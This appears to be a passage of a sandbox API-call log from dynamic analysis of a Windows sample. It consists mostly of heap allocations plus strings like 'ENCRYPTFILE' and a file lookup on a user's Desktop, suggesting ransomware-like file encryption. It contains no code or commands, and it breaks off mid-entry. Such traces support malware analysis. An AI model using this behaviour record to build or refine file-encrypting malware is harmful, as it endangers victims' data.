1 [0134.932] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0134.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0134.933] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0134.933] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0134.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0134.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0134.933] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0134.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0134.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0134.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0134.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0134.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0134.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0134.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0134.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0134.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0134.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0134.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a088 [0134.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0134.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0134.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a088 | out: hHeap=0x1780000) returned 1 [0134.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0134.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0134.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0134.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0134.934] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0134.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0134.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0134.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0134.934] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0134.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0134.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0134.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0134.935] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\xvNld.ots", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817bb4b0, ftCreationTime.dwHighDateTime=0x1d5e329, ftLastAccessTime.dwLowDateTime=0x1f1ffa10, ftLastAccessTime.dwHighDateTime=0x1d5e2f2, ftLastWriteTime.dwLowDateTime=0x1f1ffa10, ftLastWriteTime.dwHighDateTime=0x1d5e2f2, nFileSizeHigh=0x0, nFileSizeLow=0x13845, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="xvNld.ots", cAlternateFileName="")) returned 0x41ac280 [0134.935] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0134.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0134.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0134.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0134.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0134.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0134.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0134.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0134.935] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0134.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0134.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0134.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0134.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0134.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0134.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0134.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0134.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0134.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0134.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0134.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0134.936] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0134.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43924c8 [0134.936] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0134.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43924c8 | out: hHeap=0x1780000) returned 1 [0134.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0134.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0134.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0134.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0134.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0134.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0134.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0134.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0134.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0134.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0134.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0134.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0134.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0134.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0134.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0134.938] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0134.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0134.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0134.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0134.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0134.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0134.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0134.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0134.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0134.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0134.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0134.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0134.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0134.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0134.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0134.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0134.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0134.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0134.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0134.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0134.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0134.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0134.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0134.941] RtlAllocateHeap 